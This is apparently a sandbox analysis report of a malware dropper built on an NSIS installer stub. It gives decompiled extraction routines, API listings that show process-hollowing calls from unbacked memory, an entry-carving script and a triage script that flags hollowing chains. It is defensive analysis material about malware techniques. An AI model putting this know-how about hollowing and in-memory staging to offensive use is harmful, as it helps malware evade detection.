                                                                          				void* _t99;
                                                                          				void* _t100;
                                                                          				long _t101;
                                                                          				int _t102;
                                                                          				long _t103;
                                                                          				int _t104;
                                                                          				intOrPtr _t105;
                                                                          				long _t106;
                                                                          				void* _t107;
                                                                          
                                                                          				_t102 = _a16;
                                                                          				_t99 = _a12;
                                                                          				_v12 = _t102;
                                                                          				if(_t99 == 0) {
                                                                          					_v12 = 0x8000;                  // no caller buffer: use the 32 KiB static output buffer
                                                                          				}
                                                                          				_v8 = 0;
                                                                          				_v16 = _t99;
                                                                          				if(_t99 == 0) {
                                                                          					_v16 = 0x78d938;                // address of that static output buffer
                                                                          				}
                                                                          				_t66 = _a4;
                                                                          				if(_a4 >= 0) {
                                                                          					E004030FF( *0x7a2fd8 + _t66);   // seek the installer file to data-block base + entry offset
                                                                          				}
                                                                          				_t68 = E004030CD( &_a16, 4); // executed   (ReadSelfFile: 4-byte entry header, bit 31 = compressed)
                                                                          				if(_t68 == 0) {
                                                                          					L44:
                                                                          					_push(0xfffffffd);              // -3: read from the installer file failed
                                                                          					goto L45;
                                                                          				} else {
                                                                          					if((_a19 & 0x00000080) == 0) {  // stored (uncompressed) entry
                                                                          						if(_t99 != 0) {
                                                                          							if(_a16 < _t102) {
                                                                          								_t102 = _a16;       // to memory: read min(entry length, buffer size) straight into the buffer
                                                                          							}
                                                                          							if(E004030CD(_t99, _t102) != 0) {
                                                                          								_v8 = _t102;
                                                                          								L47:
                                                                          								return _v8;
                                                                          							} else {
                                                                          								goto L44;
                                                                          							}
                                                                          						}
                                                                          						if(_a16 <= 0) {
                                                                          							goto L47;
                                                                          						}
                                                                          						while(1) {                  // to file: copy through the staging buffer at 0x789938, 0x8000 bytes per pass
                                                                          							_t103 = _v12;
                                                                          							if(_a16 < _t103) {
                                                                          								_t103 = _a16;
                                                                          							}
                                                                          							if(E004030CD(0x789938, _t103) == 0) {
                                                                          								goto L44;
                                                                          							}
                                                                          							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed   (_a12 is 0 here and is reused as the bytes-written slot)
                                                                          							if(_t74 == 0 || _t103 != _a12) {   // short write
                                                                          								L30:
                                                                          								_push(0xfffffffe);  // -2: write to the destination file failed
                                                                          								L45:
                                                                          								_pop(_t69);
                                                                          								return _t69;
                                                                          							} else {
                                                                          								_v8 = _v8 + _t103;
                                                                          								_a16 = _a16 - _t103;
                                                                          								if(_a16 > 0) {
                                                                          									continue;
                                                                          								}
                                                                          								goto L47;
                                                                          							}
                                                                          						}
                                                                          						goto L44;
                                                                          					}
                                                                          					// compressed entry
                                                                          					_t75 = GetTickCount();
                                                                          					_t13 =  &_a16;
                                                                          					 *_t13 = _a16 & 0x7fffffff;     // strip the compressed flag: remaining input bytes
                                                                          					_v20 = _t75;
                                                                          					 *0x40b038 = 0xb;               // reset the inflate stream state (inflateReset)
                                                                          					 *0x40b050 = 0;
                                                                          					_a4 = _a16;                     // total input length, kept for the progress percentage
                                                                          					if( *_t13 <= 0) {
                                                                          						goto L47;
                                                                          					}
                                                                          					while(1) {
                                                                          						L10:
                                                                          						_t104 = 0x4000;             // feed the inflater at most 16 KiB of input per pass
                                                                          						if(_a16 < 0x4000) {
                                                                          							_t104 = _a16;
                                                                          						}
                                                                          						if(E004030CD(0x789938, _t104) == 0) {
                                                                          							goto L44;
                                                                          						}
                                                                          						_a16 = _a16 - _t104;
                                                                          						 *0x40b028 = 0x789938;      // stream.next_in
                                                                          						 *0x40b02c = _t104;         // stream.avail_in
                                                                          						while(1) {
                                                                          							_t100 = _v16;
                                                                          							 *0x40b030 = _t100;     // stream.next_out
                                                                          							 *0x40b034 = _v12;      // stream.avail_out
                                                                          							_t79 = E00405D9D(0x40b028);   // inflate(&stream)
                                                                          							_v28 = _t79;
                                                                          							if(_t79 < 0) {
                                                                          								break;              // inflate error: returns -4 below
                                                                          							}
                                                                          							_t105 =  *0x40b030; // 0x78ed38
                                                                          							_t106 = _t105 - _t100;  // bytes produced by this inflate call
                                                                          							_t80 = GetTickCount();
                                                                          							_t101 = _t80;
                                                                          							// status-update flag set, and more than 200 ms since the last update or input exhausted
                                                                          							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                                          								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                          								_t107 = _t107 + 0xc;    // cdecl stack cleanup for the three wsprintfA arguments
                                                                          								E00404D62(0,  &_v92);   // update_status_text: show the percentage in the installer window
                                                                          								_v20 = _t101;
                                                                          							}
                                                                          							if(_t106 == 0) {        // no output: the inflater needs more input
                                                                          								if(_a16 > 0) {
                                                                          									goto L10;
                                                                          								}
                                                                          								goto L47;
                                                                          							} else {
                                                                          								if(_a12 != 0) {     // memory destination: advance the caller's buffer
                                                                          									_v12 = _v12 - _t106;
                                                                          									_v8 = _v8 + _t106;
                                                                          									_t82 =  *0x40b030; // 0x78ed38
                                                                          									_v16 = _t82;
                                                                          									if(_v12 < 1) {  // buffer full
                                                                          										goto L47;
                                                                          									}
                                                                          									L25:
                                                                          									if(_v28 != 4) { // 4 = Z_STREAM_END: stop once the stream is complete
                                                                          										continue;
                                                                          									}
                                                                          									goto L47;
                                                                          								}
                                                                          								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                                          								if(_t84 == 0 || _v24 != _t106) {   // short write
                                                                          									goto L30;
                                                                          								} else {
                                                                          									_v8 = _v8 + _t106;
                                                                          									goto L25;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						_push(0xfffffffc);          // -4: inflate reported an error
                                                                          						goto L45;
                                                                          					}
                                                                          					goto L44;
                                                                          				}
                                                                          			}

                                                                          Instruction address column for the C-code above (0x00402ec5 to 0x004030c3, with 0x00000000 for synthesized control-flow lines); the per-line alignment with the code was lost in extraction.
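The decompiled routine above is the stub's reader for one entry of its data block: a 4-byte length header whose top bit marks the entry as compressed, then either a straight copy or an inflate loop fed 16 KiB at a time, with -2/-3/-4 returned for write, read and inflate failures. The following is an added example, not code from the sample or from the NSIS project: the same logic in Python, usable to carve an entry (for instance the dropped DLL) out of the installer once its data-block offset is known. Assumptions not taken from the page: compressed entries are raw DEFLATE streams without a zlib header (hence `wbits=-15`), and all function and constant names are mine; the test data is constructed.

```python
import io
import struct
import zlib
from typing import BinaryIO, Optional

# Constants visible in the decompiled routine
COMPRESSED_FLAG = 0x80000000  # bit 31 of the 4-byte entry header ("_a19 & 0x80")
READ_CHUNK = 0x4000           # input fed to the inflater per pass (the 0x4000 in the loop)
COPY_CHUNK = 0x8000           # staging buffer size on the stored-to-file path
ERR_WRITE, ERR_READ, ERR_INFLATE = -2, -3, -4   # 0xfffffffe / 0xfffffffd / 0xfffffffc


def extract_entry(src: BinaryIO, offset: int, out: BinaryIO,
                  out_limit: Optional[int] = None) -> int:
    """Copy one data-block entry starting at `offset` in `src` to `out`.

    offset < 0 means "continue at the current file position", as in the stub.
    `out_limit` emulates the to-memory variant (stop after that many bytes).
    Returns the number of bytes produced, or one of the negative codes above.
    """
    if offset >= 0:
        src.seek(offset)
    header = src.read(4)
    if len(header) != 4:
        return ERR_READ
    (raw_len,) = struct.unpack("<I", header)
    remaining = raw_len & 0x7FFFFFFF          # strip the compressed flag
    produced = 0

    if not raw_len & COMPRESSED_FLAG:
        # Stored entry: straight copy, bounded by the caller's buffer on the memory path.
        if out_limit is not None:
            n = min(remaining, out_limit)
            chunk = src.read(n)
            if len(chunk) != n:
                return ERR_READ
            out.write(chunk)
            return n
        while remaining > 0:
            n = min(remaining, COPY_CHUNK)
            chunk = src.read(n)
            if len(chunk) != n:
                return ERR_READ
            if out.write(chunk) != n:         # short write, like the WriteFile check
                return ERR_WRITE
            produced += n
            remaining -= n
        return produced

    # Compressed entry. Assumption: raw DEFLATE, no zlib header (wbits=-15).
    inflater = zlib.decompressobj(wbits=-15)
    while remaining > 0:
        n = min(remaining, READ_CHUNK)
        chunk = src.read(n)
        if len(chunk) != n:
            return ERR_READ
        remaining -= n
        try:
            data = inflater.decompress(chunk)
        except zlib.error:
            return ERR_INFLATE
        if out_limit is not None:             # memory path: never exceed the caller's buffer
            data = data[: out_limit - produced]
        if data:
            if out.write(data) != len(data):
                return ERR_WRITE
            produced += len(data)
            if out_limit is not None and produced >= out_limit:
                return produced               # buffer full (the "_v12 < 1" exit)
        if inflater.eof:                      # Z_STREAM_END: entry fully inflated
            return produced
    return produced                           # input exhausted without stream end


def extract_to_bytes(blob: bytes, offset: int = 0, limit: Optional[int] = None):
    """Convenience wrapper: returns the extracted bytes, or the negative error code."""
    out = io.BytesIO()
    rc = extract_entry(io.BytesIO(blob), offset, out, limit)
    return out.getvalue() if rc >= 0 else rc


def build_entry(payload: bytes, compressed: bool) -> bytes:
    """Construct a data-block entry for testing (constructed data, not from the sample)."""
    if compressed:
        c = zlib.compressobj(level=9, wbits=-15)
        body = c.compress(payload) + c.flush()
        return struct.pack("<I", len(body) | COMPRESSED_FLAG) + body
    return struct.pack("<I", len(payload)) + payload


if __name__ == "__main__":
    sample = bytes(range(256)) * 300          # constructed 76,800-byte payload
    blob = build_entry(sample, compressed=True)
    print(len(blob), "bytes in the data block ->", len(extract_to_bytes(blob)), "bytes extracted")
```

To carve a real entry, open the installer, seek to the data-block base plus the entry offset (the `*0x7a2fd8 + _a4` computation in the stub), and call `extract_entry` with a file opened for writing; a negative return maps one-to-one to the stub's error codes.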

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402F1F
                                                                          • GetTickCount.KERNEL32 ref: 00402FA6
                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                                                          • wsprintfA.USER32 ref: 00402FE3
                                                                          • WriteFile.KERNELBASE(00000000,00000000,0078ED38,7FFFFFFF,00000000), ref: 00403011
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: CountTick$FileWritewsprintf
                                                                          • String ID: ... %d%%$8x
                                                                          • API String ID: 4209647438-795837185
                                                                          • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                          • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                                                          • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                          • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 026714FF
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0267155E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: AllocCreateFileVirtual
                                                                          • String ID: e6930c0fc78a4144acb5b27197cf04bb
                                                                          • API String ID: 1475775534-3037024217
                                                                          • Opcode ID: 275eac65df612a1e6b73968f0bc1e47eb40d7aa27af893a17d1ac999ba8f4b68
                                                                          • Instruction ID: 6014604044e98ce02e883d6186938342e6356cc8dc5c54e5335178733328fa5e
                                                                          • Opcode Fuzzy Hash: 275eac65df612a1e6b73968f0bc1e47eb40d7aa27af893a17d1ac999ba8f4b68
                                                                          • Instruction Fuzzy Hash: D8E14C35D54388EEEB21CBE4EC15BEDBBB5AF05710F10408AE608FA1D1D7B50A84DB29
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 026707DF
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 026709AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: 8422cf8cb77b0d143726b15500871e2212305ee572a63309b2dee486b40caa12
                                                                          • Instruction ID: b7a23b6ffe122119ff564a26d839a7154b6945673a6a53905b8a7b3c16b1efae
                                                                          • Opcode Fuzzy Hash: 8422cf8cb77b0d143726b15500871e2212305ee572a63309b2dee486b40caa12
                                                                          • Instruction Fuzzy Hash: DBA10174E00209EFEF10DFE4E985BADBBB1BF08315F20849AE515BA2A0D3755A51DF24
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 84%
                                                                          			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
                                                                          				int _t19;
                                                                          				struct _SECURITY_ATTRIBUTES* _t20;
                                                                          				signed char _t22;
                                                                          				struct _SECURITY_ATTRIBUTES* _t23;
                                                                          				CHAR* _t25;
                                                                          				struct _SECURITY_ATTRIBUTES** _t27;
                                                                          				struct _SECURITY_ATTRIBUTES** _t29;
                                                                          				void* _t30;
                                                                          
                                                                          				_t23 = __ebx;                                  // caller passes 0 here; reused below both as NULL and as the '\0' terminator
                                                                          				_t25 = E00402A9A(0xfffffff0);                  // resolve the directory path argument into a string buffer
                                                                          				_t27 = E0040555F(_t25);                        // skip the drive/root part (the CharNextA walk listed under APIs)
                                                                          				if( *_t25 != __ebx && _t27 != __ebx) {
                                                                          					do {
                                                                          						_t29 = E004054F7(_t27, 0x5c);          // find the next '\' separator
                                                                          						 *_t29 = _t23;                          // temporarily NUL-terminate at the separator ...
                                                                          						 *((char*)(_t30 + 0xb)) =  *_t29;       // ... after saving the byte that was there
                                                                          						_t19 = CreateDirectoryA(_t25, _t23); // executed; creates each path prefix in turn (mkdir -p style)
                                                                          						if(_t19 == 0) {
                                                                          							if(GetLastError() != 0xb7) {           // 0xb7 == ERROR_ALREADY_EXISTS
                                                                          								L5:
                                                                          								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;   // count the failure
                                                                          							} else {
                                                                          								_t22 = GetFileAttributesA(_t25); // executed
                                                                          								if((_t22 & 0x00000010) == 0) {     // 0x10 == FILE_ATTRIBUTE_DIRECTORY; an existing file of that name is an error
                                                                          									goto L5;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                          						 *_t29 = _t20;                          // restore the saved byte and move on to the next component
                                                                          						_t27 =  &(_t29[0]);
                                                                          					} while (_t20 != _t23);                     // stop once the saved byte was the terminating NUL
                                                                          				}
                                                                          				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                          					_push(0xfffffff5);
                                                                          					E00401428();                                // status message only
                                                                          				} else {
                                                                          					E00401428(0xffffffe6);                      // status message, then make the new directory the current/output directory
                                                                          					E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
                                                                          					SetCurrentDirectoryA(_t25); // executed
                                                                          				}
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));   // add the failures to the global error counter
                                                                          				return 0;
                                                                          			}


                                                                          APIs
                                                                            • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 0040556D
                                                                            • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                                                            • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                          • API String ID: 3751793516-501415292
                                                                          • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                          • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                                                          • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                                                          • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                          				signed int _t11;
                                                                          				int _t14;
                                                                          				signed int _t16;
                                                                          				void* _t19;
                                                                          				CHAR* _t20;
                                                                          
                                                                          				_t20 = _a4;
                                                                          				_t19 = 0x64;                                   // up to 100 attempts
                                                                          				while(1) {
                                                                          					_t19 = _t19 - 1;
                                                                          					_a4 = 0x61736e;                            // little-endian bytes "nsa\0": the temp-file name prefix
                                                                          					_t11 = GetTickCount();
                                                                          					_t16 = 0x1a;
                                                                          					_a6 = _a6 + _t11 % _t16;                   // _a6 overlays the 'a' byte: 'a' + (tick % 26), so names start "ns" + one letter a..z
                                                                          					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed; uUnique == 0 creates the file in directory _a8 immediately
                                                                          					if(_t14 != 0) {
                                                                          						break;
                                                                          					}
                                                                          					if(_t19 != 0) {
                                                                          						continue;
                                                                          					}
                                                                          					 *_t20 =  *_t20 & 0x00000000;              // every attempt failed: hand back an empty name
                                                                          					return _t14;
                                                                          				}
                                                                          				return _t20;                                   // buffer now holds the path of the created temp file
                                                                          			}


                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 004056D2
                                                                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                                                          • nsa, xrefs: 004056CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                                                          • API String ID: 1716503409-1609819632
                                                                          • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                          • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                                                          • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                                          • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 0267034B
                                                                          • GetThreadContext.KERNELBASE(?,00010007), ref: 0267036E
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02670392
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThread
                                                                          • String ID:
                                                                          • API String ID: 2411489757-0
                                                                          • Opcode ID: 66e73b3f3eb02583a27478a9a57178bcb0c997f264448aff56fcfcd7a0c06261
                                                                          • Instruction ID: fb02b46711ff183f4780a9f649e86a3e9379db37b657fa95d460dbfc681da2bf
                                                                          • Opcode Fuzzy Hash: 66e73b3f3eb02583a27478a9a57178bcb0c997f264448aff56fcfcd7a0c06261
                                                                          • Instruction Fuzzy Hash: ED221731D50218EFEB24CFA4ED55BADB7B5BF48704F20409AE608FA2A0D7705A85DF25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
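The listings above are the evidence behind several of the report's verdicts: the VirtualAlloc/CreateFileW and CreateFileW/VirtualFree functions are dumped from the region at 0x02670000 that is reported as "based on PE: false" (code running from memory not backed by a loaded image), the CreateProcessW / GetThreadContext / ReadProcessMemory chain is the process-hollowing signature, and the GetTickCount/GetTempFileNameA pair is the dropper's temp-file creation. The script below is an added triage helper, not part of the report or of the sample: it parses blocks in this page's listing format, groups API calls per function together with the "based on PE" flag of their dump, and applies three heuristics (hollowing API chain, Win32 calls from unbacked memory, executable or oversized VirtualAlloc). The embedded input is constructed to mirror the lines above; the API name sets and the 256 MB size threshold are assumptions of the example, not values taken from the report.

```python
"""
Triage helper for the per-function API listings of a sandbox disassembly
report.  Added example; not code from the original report or the sample.

Heuristics (assumptions of this example, not ground truth):
  * process-hollowing API chain: CreateProcess* + *ThreadContext + a
    remote-memory call inside one function;
  * Win32 calls issued from a dump region reported as "based on PE: false",
    i.e. memory not backed by a loaded image (unpacked stage or shellcode);
  * VirtualAlloc with PAGE_EXECUTE_READWRITE, or an oversized request.
"""
import re
from dataclasses import dataclass, field

# Constructed excerpt that mirrors the page's listing format (not a live run).
SAMPLE_REPORT = """\
APIs
• VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 026714FF
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0267155E
Memory Dump Source
• Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
Uniqueness Score: -1.00%

APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0267034B
• GetThreadContext.KERNELBASE(?,00010007), ref: 0267036E
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02670392
Memory Dump Source
• Source File: 00000000.00000002.219792320.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 004056D2
• GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004056EC
Memory Dump Source
• Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Uniqueness Score: -1.00%
"""

# "• Api.MODULE(args), ref: ADDR" with optional "Part of subcall function X:" prefix
# and optional argument list (GetTickCount is listed without one).
API_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SRC_RE = re.compile(
    r"Source File:.*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{1,8}$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # int for hex literals, None for '?' and string arguments
    ref: int


@dataclass
class FunctionBlock:
    offset: int = 0
    in_image: bool = True
    apis: list = field(default_factory=list)


def parse_args(raw):
    if not raw:
        return []
    return [int(t.strip(), 16) if HEX_RE.match(t.strip()) else None for t in raw.split(",")]


def parse_report(text):
    """Split the report into per-function blocks; a 'Uniqueness Score' line ends a block."""
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["api"], m["mod"], parse_args(m["args"]), int(m["ref"], 16)))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.offset, cur.in_image = int(m["off"], 16), m["pe"] == "true"
            continue
        if line.strip().startswith("Uniqueness Score"):
            if cur.apis:
                blocks.append(cur)
            cur = FunctionBlock()
    if cur.apis:
        blocks.append(cur)
    return blocks


CREATE = {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}
CONTEXT = {"GetThreadContext", "SetThreadContext", "Wow64GetThreadContext", "Wow64SetThreadContext"}
REMOTE_MEM = {"ReadProcessMemory", "WriteProcessMemory", "NtReadVirtualMemory",
              "NtWriteVirtualMemory", "NtUnmapViewOfSection", "ZwUnmapViewOfSection", "VirtualAllocEx"}
PAGE_EXECUTE_READWRITE = 0x40
OVERSIZED = 256 * 1024 * 1024    # assumed threshold for this example


def triage(block):
    names = {a.name for a in block.apis}
    findings = []
    if names & CREATE and names & CONTEXT and names & REMOTE_MEM:
        findings.append("process-hollowing API chain: "
                        + ", ".join(sorted(names & (CREATE | CONTEXT | REMOTE_MEM))))
    if not block.in_image and names & (CREATE | {"VirtualAlloc", "CreateFileA", "CreateFileW"}):
        findings.append("Win32 calls from unbacked memory at 0x%08X" % block.offset)
    for a in block.apis:
        if a.name == "VirtualAlloc" and len(a.args) >= 4:
            size, protect = a.args[1], a.args[3]       # dwSize, flProtect
            if protect == PAGE_EXECUTE_READWRITE:
                findings.append("VirtualAlloc with PAGE_EXECUTE_READWRITE at ref 0x%08X" % a.ref)
            if size is not None and size >= OVERSIZED:
                findings.append("oversized VirtualAlloc of 0x%X bytes at ref 0x%08X" % (size, a.ref))
    return findings


def report_findings(text):
    """Return (offset, in_image, findings) for every block that trips a heuristic."""
    return [(b.offset, b.in_image, triage(b)) for b in parse_report(text) if triage(b)]


if __name__ == "__main__":
    for offset, in_image, findings in report_findings(SAMPLE_REPORT):
        print("0x%08X (image-backed=%s)" % (offset, in_image))
        for f in findings:
            print("  -", f)
```

Run against the constructed excerpt, the two blocks from the 0x02670000 region are flagged (the first for its unbacked-memory calls and the roughly 450 MB VirtualAlloc, the second for the hollowing chain) and the image-backed temp-file function is not. The heuristics are deliberately coarse: a real triage pass would also check the CreateProcess flags for CREATE_SUSPENDED and pair the chain with SetThreadContext/ResumeThread, which this report lists with "?" arguments and so cannot be resolved from the listing alone.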

C-Code - Quality: 73%
E0040136D(signed int _a4) {
	intOrPtr* _t8;
	int _t10;
	signed int _t12;
	int _t13;
	int _t14;
	signed int _t21;
	int _t24;
	signed int _t27;
